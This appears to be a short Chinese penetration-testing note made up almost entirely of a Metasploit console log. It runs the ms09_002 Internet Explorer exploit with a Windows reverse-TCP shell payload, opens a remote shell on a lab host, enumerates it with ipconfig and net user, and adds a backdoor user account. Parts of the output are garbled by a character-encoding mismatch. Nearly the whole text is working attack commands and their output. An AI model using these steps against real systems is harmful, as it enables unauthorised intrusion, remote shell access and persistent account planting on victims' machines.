渗透杂记-2013-07-13

Welcome to the Metasploit Web Console!
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 308 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 308 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating >> use windows/browser/ms09_002_memory_corruption
>> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> set SRVHOST 172.16.2.100
SRVHOST => 172.16.2.100
>> set LHOST 172.16.2.100
LHOST => 172.16.2.100
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 172.16.2.100 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 172.16.2.100 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.2.100:4444
[*] Using URL: http://172.16.2.100:8080/9wZVWxuy [*] Server started.
>> back
>> sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell 172.16.2.100:4444 -> 172.16.2.120:1125
>> sessions -i 1
sessions -i 1
'sessions' 2?ê??ú2??òía2??üá?￡?ò22?ê??é??DDμ?3ìDò
?ò?ú′|àí???t?￡
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : www-95a235b5556
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> net user
net user
\\WWW-95A235B5556 μ?ó??§?ê?§
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0
?üá?3é1|íê3é?￡
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> net user shentouceshiwy /add
net user shentouceshiwy /add
?üá?3é1|íê3é?￡
C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>
>> net user
net user
\\WWW-95A235B5556 μ?ó??§?ê?§
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
shentouceshiwy SUPPORT_388945a0
?üá?3é1|íê3é?￡